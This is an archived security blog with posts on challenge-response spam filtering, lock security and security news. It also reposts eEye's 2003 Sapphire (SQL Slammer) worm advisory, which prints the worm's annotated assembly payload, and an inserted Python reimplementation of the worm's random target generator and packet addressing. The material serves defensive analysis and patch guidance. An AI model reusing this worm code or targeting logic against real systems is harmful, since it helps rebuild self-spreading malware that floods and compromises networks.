This is an archived project. See http://blogs.23.nu/disLEXia/stories/492/ for details and further pointers.

disLEXia

security - security whatever that means

Tuesday, 20. May 2003

A Response to a Challenging Response to Challenge-Response

Edward Felten has a piece on anti-spam CR (challenge-response) systems which I consider less sharp than his usual writing.

First some empirical data: I deployed the TMDA CR system last month on an address that has been used for about 6 years on the web and on Usenet. It reduced spam from about 150 mails per day to about one per week. I would not call this "a modest benefit". But trying to send all those challenges to the incredibly broken addresses used by spammers puts a considerable load on my mail server. The outgoing queue now usually contains several hundred messages.

About spammers responding to the challenges: this could be done, but it would dramatically change the economics of spamming. The amount of resources needed to send spam would increase by orders of magnitude and probably make it uneconomic to do so.

Also the concern about Alice having to open a loophole for receiving Bob's challenge seems overrated to me: Alice has a way to communicate an individual loophole to Bob in the first place, since she is actually sending mail to him. Keep in mind that this loophole only has to be 'secure' enough to make spamming as expensive as ... say US$ 1 per mail. So we don't have to worry about Eve sniffing the mails and other sophisticated attacks.

An obvious way to fix the loophole problem is Alice whitelisting all addresses she sends mail to (I do that). An alternative would be that Alice uses a special address only valid for some time or in conjunction with a certain Message-ID in the References header or the like. People more experienced in security protocol design than me would find dozens of elegant ways to implement 'secure' loopholes.
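To make the two loophole mechanisms above concrete, here is an added example (not code from this blog or from TMDA; the address layout, the 48-bit HMAC tag and the header names are my assumptions) that implements both: a whitelist of everybody Alice has written to, and a time-limited sender address whose tag can additionally be bound to the Message-ID Bob will quote in his References header. The tag is deliberately short, because the only bar it has to clear is making a forged reply cost more than the spam is worth.

```python
import hashlib
import hmac
import re

TAG_LEN = 12  # hex chars (48 bits); assumption, sized for "US$ 1 per mail", not for Eve


def make_tagged_address(local, domain, key, expires_at, msgid=""):
    """Alice's per-correspondent sender address.  The tag commits to the local part,
    an expiry (unix seconds) and, optionally, the Message-ID of the mail she sends,
    so Bob's reply (which quotes that ID in References) unlocks the loophole."""
    data = f"{local}|{expires_at}|{msgid}".encode()
    tag = hmac.new(key, data, hashlib.sha256).hexdigest()[:TAG_LEN]
    return f"{local}-{expires_at}-{tag}@{domain}"


# Assumed layout: local-EXPIRY-TAG@domain (non-greedy local part, digits, lowercase hex).
_TAGGED = re.compile(
    r"^(?P<local>[^@]+?)-(?P<exp>\d+)-(?P<tag>[0-9a-f]{%d})@(?P<domain>[^@]+)$" % TAG_LEN
)


def verify_tagged_address(addr, key, now, msgid=""):
    """True only if the address parses, has not expired, and the tag matches."""
    m = _TAGGED.match(addr)
    if m is None or now > int(m["exp"]):
        return False
    data = f"{m['local']}|{m['exp']}|{msgid}".encode()
    expected = hmac.new(key, data, hashlib.sha256).hexdigest()[:TAG_LEN]
    return hmac.compare_digest(expected, m["tag"])


def _message_ids(header):
    """All <...> tokens of a References header (empty header -> no IDs)."""
    return re.findall(r"<[^>]+>", header or "")


def classify_inbound(msg, whitelist, key, now):
    """Decide whether Alice's CR system must challenge an inbound message.

    msg: dict with bare-address "from" and "to" plus an optional "references" header.
    whitelist: addresses Alice has sent mail to; she adds to it on every outbound mail.
    Returns "accept" or "challenge"."""
    if msg["from"].lower() in whitelist:
        return "accept"
    # A mail to a tagged address passes if the tag verifies either unbound or
    # bound to one of the Message-IDs Bob quotes in References.
    for msgid in [""] + _message_ids(msg.get("references")):
        if verify_tagged_address(msg["to"], key, now, msgid):
            return "accept"
    return "challenge"


if __name__ == "__main__":
    key = b"constructed-demo-secret"          # constructed, not a real key
    sent_id = "<20030520.1@example.org>"       # the Message-ID Alice put on her mail to Bob
    bounce = make_tagged_address("alice", "example.org", key, 1_100_000_000, sent_id)
    print("Alice writes to Bob from:", bounce)
    reply = {"from": "bob@example.net", "to": bounce, "references": sent_id}
    print("Bob's reply:", classify_inbound(reply, set(), key, 1_050_000_000))
    spam = {"from": "x@spammer.invalid", "to": bounce, "references": ""}
    print("Unrelated mail to the same address:", classify_inbound(spam, set(), key, 1_050_000_000))
```

The whitelist is the cheap half (a set Alice's outbound path appends to); the tagged address is what protects her when Bob's challenge comes from an address she never wrote to, e.g. a mailing list's CR bot.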

But: surely CR - like other spam defence mechanisms - destroys email as a universal communication medium. And by setting up any kind of spam defense system you must be aware that you make people sending you mail jump through certain hoops. Maybe you keep them from using the subject lines they like or prohibit certain words in the message body. Maybe you set rigid rules on the configuration and placement of their mail server. Maybe you make them answer challenges. All this makes running mailing lists more and more complicated. This is nothing new: for a long time now AOL has forced a contract on you if you wanted to distribute a mailing list (meaning more than N messages per hour) to AOL customers.

But in one thing Felten is certainly right: CR and other spam filtering techniques will produce unexpected interactions for a long time.
08:30



Monday, 27. January 2003

SQL Sapphire Worm Analysis

Forwarded from: "Marc Maiffret" <marc@eeye.com>

SQL Sapphire Worm Analysis

Release Date:
1/25/03

Severity:
High

Systems Affected:
Microsoft SQL Server 2000 pre SP 2

Description:
Late Friday, January 24, 2003 we became aware of a new SQL worm
spreading quickly across various networks around the world.

The worm is spreading using a buffer overflow to exploit a flaw in
Microsoft SQL Server 2000. The SQL 2000 server flaw was discovered in
July, 2002 by Next Generation Security Software Ltd. The buffer
overflow exists because of the way SQL improperly handles data sent to
its Microsoft SQL Monitor port. Attackers leveraging this
vulnerability will be executing their code as SYSTEM, since Microsoft
SQL Server 2000 runs with SYSTEM privileges.

The worm works by generating pseudo-random IP addresses to try to
infect with its payload. The worm payload does not contain any
additional malicious content (in the form of backdoors etc.); however,
because of the nature of the worm and the speed at which it attempts
to re-infect systems, it can potentially create a denial-of-service
attack against infected networks.

We have been able to verify that multiple points of connectivity on
the Internet have been bogged down since 9pm Pacific Standard Time.

It should be noted that this worm is not the same as an earlier SQL
worm that used the SA/nopassword SQL vulnerability as its spread
vector. This new worm is more devastating as it is taking
advantage of a software-specific flaw rather than a configuration
error. We have already had many reports of smaller networks brought
down due to the flood of data from the Sapphire Worm trying to
re-infect new systems.

Corrective Action

We recommend that people immediately firewall SQL service ports at all
of their gateways. The worm uses only UDP port 1434 (SQL Monitor Port)
to spread itself to a new system; however, it is safe practice to
filter all SQL traffic at all gateways. The following is a list of
SQL server ports:

ms-sql-s 1433/tcp #Microsoft-SQL-Server
ms-sql-s 1433/udp #Microsoft-SQL-Server
ms-sql-m 1434/tcp #Microsoft-SQL-Monitor
ms-sql-m 1434/udp #Microsoft-SQL-Monitor

Once again this worm is taking advantage of a known vulnerability that
has had a patch available for many months. Microsoft has also released
a recent service pack for SQL (Service Pack 3) that includes a fix for
this vulnerability.

Standalone patch:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-039.asp

SQL 2000 Service Pack 3:
http://www.microsoft.com/sql/downloads/2000/sp3.asp

Previous SQL Service Pack versions are vulnerable.

Technical Description

The following is a quick run-down of what the worm's payload is doing after
infection:

1. Retrieves the addresses of GetProcAddress and LoadLibrary from the
IAT in sqlsort.dll. It snags the necessary library base addresses and
function entry points as needed.
2. Calls GetTickCount, and uses the returned count as a pseudo-random seed
3. Creates a UDP socket
4. Performs a simple pseudo-random number generation formula using the
returned GetTickCount value to generate an IP address that will later
be used as the target.
5. Sends the worm payload in a SQL Server Resolution Service request to the
pseudo-random target address, on port 1434 (UDP).
6. Returns to the formula and continues generating new pseudo-random
addresses.


push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp
mov eax, 1010101h ; Reconstruct session: after the overflow the payload buffer
                  ; gets corrupted during program execution but before the
                  ; payload is executed.
xor ecx, ecx
mov cl, 18h

FIXUP:
push eax
loop FIXUP
xor eax, 5010101h
push eax
mov ebp, esp
push ecx
push 6C6C642Eh
push 32336C65h
push 6E72656Bh ; kernel32
push ecx
push 746E756Fh ; GetTickCount
push 436B6369h
push 54746547h
mov cx, 6C6Ch
push ecx
push 642E3233h ; ws2_32.dll
push 5F327377h
mov cx, 7465h
push ecx
push 6B636F73h ; socket
mov cx, 6F74h
push ecx
push 646E6573h ; sendto
mov esi, 42AE1018h ; IAT from sqlsort
lea eax, [ebp-2Ch] ; (ws2_32.dll)
push eax
call dword ptr [esi] ; call loadlibrary
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-10h] ; (kernel32.dll)
push eax
call dword ptr [esi] ; loadlibrary
push eax
mov esi, 42AE1010h ; IAT from sqlsort
mov ebx, [esi]
mov eax, [ebx]
cmp eax, 51EC8B55h ; check entry point fingerprint
jz short VALID_GP ; Check entry point fingerprint for GetProcAddress; if it fails,
                  ; fall back to the GetProcAddress entry in another DLL version.
                  ; Undetermined what DLL versions this will succeed on. Due to
                  ; the lack of reliable importing this may not work across all
                  ; DLL versions.
mov esi, 42AE101Ch ; IAT entry -> 77EA094C

VALID_GP:
call dword ptr [esi] ; GetProcAddress
call eax ; return from GetProcAddress = GetTickCount entry point
xor ecx, ecx
push ecx
push ecx
push eax
xor ecx, 9B040103h
xor ecx, 1010101h
push ecx ; 9A050002 = port 1434 / AF_INET
lea eax, [ebp-34h] ; (socket)
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
push 11h
push 2
push 2
call eax ; socket
push eax
lea eax, [ebp-3Ch] ; sendto
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
mov esi, eax ; save sendto -> esi
or ebx, ebx
xor ebx, 0FFD9613Ch

PRND:
mov eax, [ebp-4Ch] ; Pseudo Random Algorithm Start
lea ecx, [eax+eax*2]
lea edx, [eax+ecx*4]
shl edx, 4
add edx, eax
shl edx, 8
sub edx, eax
lea eax, [eax+edx*4]
add eax, ebx ; Pseudo Random Algorithm End
mov [ebp-4Ch], eax
push 10h
lea eax, [ebp-50h]
push eax
xor ecx, ecx
push ecx
xor cx, 178h
push ecx
lea eax, [ebp+3]
push eax
mov eax, [ebp-54h]
push eax
call esi ; sendto
jmp short PRND ; Jump back to Pseudo Random Algorithm Start

In Closing
We have provided brief information here as we are currently working to
understand more of the worm's internal behavior. We will provide
updates as they become available.

This worm has been dubbed the "Sapphire Worm" by eEye due to the fact
that several engineers had to be pulled away from local bars to begin
the investigation/dissection process.

Credit:
Riley Hassell

Related Links:
SQLSecurity.com
http://sqlsecurity.com/

Microsoft Security Bulletin:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-039.asp

Copyright (c) 1998-2003 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
alert@eEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security
http://www.eEye.com
info@eEye.com [isn]
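Reading the PRND block and the stack layout in the listing above more closely gives a few facts the run-down in the advisory does not spell out, so here is an added example (my own code, not eEye's or the worm's) that reproduces the target generator in Python. The multiplier 214013 is what the lea/shl/sub chain computes; the constant 0xFFD9613C is xor'ed into ebx, but since the listing does `or ebx, ebx` instead of `xor ebx, ebx`, ebx still holds the GetProcAddress pointer read from the sqlsort IAT, so the real increment depends on that pointer. Because the pointer is 4-byte aligned and 0xFFD9613C is even, the increment is always even and the generator cannot reach every 32-bit address. The GetProcAddress pointer and tick count used in the demo are assumed values; 0x269EC3 is the increment of the Microsoft C runtime rand(), which I take to be what the author was aiming at (0xFFD9613C is -2531012 mod 2^32, one off from its negation).

```python
import struct

# Constants recovered from the listing.  The lea/shl/sub chain in PRND computes
# 3a, 13a, 208a, 209a, 53504a, 53503a and finally 214013a.
MULT = 214013
SAPPHIRE_XOR = 0xFFD9613C     # xor'ed into ebx; equals -2531012 mod 2**32
MSVCRT_INC = 0x269EC3         # 2531011, increment of the Microsoft CRT rand() (assumed intent)
PORT_AND_FAMILY = 0x9A050002  # first sockaddr_in dword as pushed: bytes 02 00 05 9A
MASK = 0xFFFFFFFF


def effective_increment(getprocaddress_ptr):
    """`or ebx, ebx` leaves ebx = [42AE1010h] (the GetProcAddress pointer) intact,
    so `xor ebx, 0FFD9613Ch` yields pointer XOR constant, not the constant itself."""
    return (getprocaddress_ptr ^ SAPPHIRE_XOR) & MASK


def lcg_step(state, inc):
    """One pass through PRND: [ebp-4Ch] = [ebp-4Ch] * 214013 + ebx (mod 2**32)."""
    return (state * MULT + inc) & MASK


def is_full_period(inc, mult=MULT):
    """Hull-Dobell for modulus 2**32: every value is produced once per cycle iff
    the increment is odd and mult-1 is a multiple of 4."""
    return inc & 1 == 1 and (mult - 1) % 4 == 0


def state_to_ip(state):
    """[ebp-4Ch] doubles as sin_addr; x86 is little-endian, so the register's
    low byte is the first octet on the wire."""
    return ".".join(str((state >> shift) & 0xFF) for shift in (0, 8, 16, 24))


def build_sockaddr(state):
    """The 16-byte sockaddr_in the worm leaves at [ebp-50h] for sendto()."""
    return struct.pack("<II", PORT_AND_FAMILY, state) + b"\x00" * 8


def parse_sockaddr(buf):
    """Decode it as the stack sees it: family little-endian, port big-endian."""
    family = struct.unpack("<H", buf[:2])[0]
    port = struct.unpack("!H", buf[2:4])[0]
    return family, port, ".".join(str(b) for b in buf[4:8])


def targets(seed, count, inc):
    """The first `count` target addresses for a given GetTickCount() seed."""
    out, state = [], seed
    for _ in range(count):
        state = lcg_step(state, inc)
        out.append(state_to_ip(state))
    return out


if __name__ == "__main__":
    # Assumed demo values: the listing's fallback IAT value 77EA094C stands in for
    # the GetProcAddress pointer; the tick count is made up.
    inc = effective_increment(0x77EA094C)
    print("effective increment 0x%08X, full period: %s" % (inc, is_full_period(inc)))
    print("CRT increment 0x%08X, full period: %s" % (MSVCRT_INC, is_full_period(MSVCRT_INC)))
    for ip in targets(0x0001E240, 5, inc):
        print("sendto 0x178 = 376 bytes -> %s:1434/udp" % ip)
```

Two practical consequences follow: the sequence is fully determined by the victim's uptime and DLL layout, so two hosts with the same sqlsort.dll and a nearby tick count scan nearly the same address list, and the even increment means whole address ranges are never generated no matter how long the worm runs.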
09:03



Len Sassaman: on locks

Len Sassaman: "Locksmiths generally don't discuss the plethora of ways to defeat standard physical security techniques with the general public. Sometimes I think they understand the issue of threat-models better than cryptographers do. They certainly understand that the public doesn't understand." [Hack the Planet]
02:26



CVS flaw could give hackers access to servers


02:18



Saturday, 25. January 2003

Sprint DSL's Gaping Security Hole puts users at risk

Sprint DSL customers are at risk of having their e-mail addresses and passwords stolen -- even when their computers are powered off -- due to weak security controls on their DSL modems.   Experts warn... [Securitynewsportal]
10:51



The Art of Budgeting for IT Security Breaches

Siebel Systems CIO Mark Sunday told the E-Commerce Times that although corporate boards are more aware of security issues than ever before, they still do not fully understand them -- and most boards a... [Securitynewsportal]
10:50



Friday, 24. January 2003

On Matt Blaze on Master Locks

Matt Blaze couldn't resist the old hacker tradition of tinkering with locks and was able to produce master keys for physical locks by keeping a cryptographer's mindset. Nifty.

Edward Felten seems a bit mad at the lock industry knowing of this but not telling us. He points out that "we need independent analysis of security technologies."

Sure, that's correct. But we also need something which spreads the analysis. As Seth Finkelstein points out, this risk had been known for a long time - but it seems it wasn't known by enough people.

Some years ago the Chaos Computer Club spun off the Mission of the Sportenthusiasts of Lockpicking (some English info on their site). They taught us that locks are mostly protected by security through obscurity. Even high-price, high-security locks often have systematic faults and can be opened without leaving a trace.

I'm wondering somewhat about the uproar over this thing among computer security people. I guess it points out again that they don't think enough about physical security. From people doing penetration testing I hear that the physical route is often the easiest. Things like a way to crawl through the ceiling from the visitors' toilet to the server room really happen.
00:34



Thursday, 28. November 2002

First hackers sighted in high speed mobile phone arena

T-Mobile has installed a firewall on its GPRS network in the States after a small number of users complained of receiving hacker probes when using its high-speed mobile service.

The issue came to light after Mike Palmer, the technology director for the broadcast division of AP, spotted numerous probes against his PC while using T-Mobile's GPRS network, Computerworld reports. [The Register]
08:47



SMS security risks highlighted by Friends Reunited hacking case

Breach of trust by two dismissed mmO2 workers, rather than deeper problems, led to the release of private text messages to a jealous boyfriend that sparked a campaign of revenge against his cheating girlfriend. [...] Nourse obtained proof of his girlfriend's infidelity by persuading two friends, employees at O2, to intercept her text messages and pass them on to him. A spokeswoman for O2 told us this was only possible because of a breach of trust by two engineering workers who have subsequently been sacked and convicted for offences under the Data Protection Act. O2 is not prepared to release the names of the pair but tells us both were convicted and fined for DPA offences this July.

The person who intercepted Nourse's girlfriend's messages worked in a "privileged position" as an engineer on O2's text platform. He was aided by another engineer. Cracker tools were not used to extract the text messages, O2 told us. The firm said that, despite the incident, it is happy with its systems and users should feel comfortable about using text messages.

Analysts Gartner said the case illustrates that SMS is not a secure environment suitable for sending confidential messages.

"The contents of SMS messages are known to the network operator's systems and personnel. Therefore, SMS is not an appropriate technology for secure communications. Most users do not realise how easy it may be to intercept," it warns.

Gartner added that the case also showed how important people issues - rather than technology concerns - are in trying to prevent security breaches. [The Register]
08:46



Sunday, 24. November 2002

Ross Anderson: Security Engineering

Rob Slade reviews my favourite, Security Engineering: "I have often been asked, in regard to these reviews, whether there are, in fact, any books that I like. Well, I like this one. If you are involved with security and you haven't read it, you should."
[Security Weblog]
19:46



Saturday, 23. November 2002

Is the new wave of cyber security just to stop web terrorism ... or is there a hidden agenda?

THE trouble with IT is that the more significant it becomes, the more open it is to attack from the same collection of reactionary fools, simian thugs and intellectual pygmies that have worked so hard to screw up the rest of human endeavour for us.

In moves that will no doubt have delighted Iraqi bunker manufacturers, the CIA this month warned that fundamentalist Muslim terror group Hezbollah is among a gaggle of shadowy miscreants hoping to wreak havoc upon the West with a wave of 'cyber-attacks'. Lawks a lawdy -- this is scary stuff.

With breathtaking serendipity, this stark message was bolstered on the same day by an announcement in London by security specialists mi2g that terrorist-backed hacking attacks on the web have increased 10-fold over the past month. The company, which has a board and advisory committee packed with players from the diplomatic, defence and intelligence services, claims that at least 3001 such incursions took place in October.

Connoisseurs of irony, for whom these are rich and fruitful times, will have enjoyed the fact that if the digital revolution is seriously threatened at all, it is largely by the people making such big pronouncements.

Let's cast our minds back to 2001, when the spectre of Code Red threatened to bring the web grinding to a halt. While off-the-record briefings from the FBI's National Infrastructure Protection Centre (NIPC) hinted strongly that the malicious worm was a Chinese cyber-attack responsible for a 30% slowing down in web speeds, it transpired that a non-politically motivated hacker from London was later arrested and the velocity breakdown traced to a train derailment in Baltimore.

By the time the truth was out the damage had been done, but that didn't particularly bother an agency that only days before had been officially censured for its incompetence and was in desperate need of a PR victory. Doubtless the security industry had no regrets over the free publicity either.

There can be no doubt that hacking does pose a very real threat to businesses and governments. Increased use of online services means that malevolent geeks have a multitude of targets to choose from, and clearly these need to be protected.

What's odd, however, is the unbelievably convenient political nature of the threats reported by security agencies. During the trial of Oklahoma bomber Timothy McVeigh it was white supremacists haunting our wires, a danger that was momentarily replaced by the online Cuban menace before switching to the Red Chinese. Since September 11, all the action has apparently been routed from Islam.

In much the same way that fear of terrorist attack has been used to introduce levels of surveillance and executive power in the US that would once have been considered massively unconstitutional, the spooks are now moving to cover the online world. The net is too democratic and makes information and ideas too accessible for such agencies to control, and consequently they're going to do something about it. Sunday Herald Nov 23 2002 3:32PM ET [moreover Computersecurity]
21:41



Research Aims To Stop Battery Attackers

A team of computer scientists is working to prevent new types of denial-of-service attacks aimed at battery-powered mobile devices. Tom Martin, a professor at Virginia Tech's electrical and computer engineering department, has received a grant for more than $400,000 from the National Science Foundation to devise a way to protect battery-operated computers from security attacks that could drain their batteries.

Although the researchers concede that such kinds of attacks are extremely rare, the proliferation of notebook computers, personal digital assistants, tablet PCs, networked cell phones and other devices could make them alluring targets.

The threat could be even more menacing to businesses that use battery backup systems to protect their databases and storage systems against electrical power outages. [LinuxSecurity.com]
09:20



Friday, 22. November 2002

Brief: T-Mobile installs GPRS network firewall

In a move to head off hacker probes detected earlier this month on its GPRS cellular network, T-Mobile USA Inc. has installed a firewall. [Computerworld]
05:23



disLEXia, a research project by Maximillian Dornseif
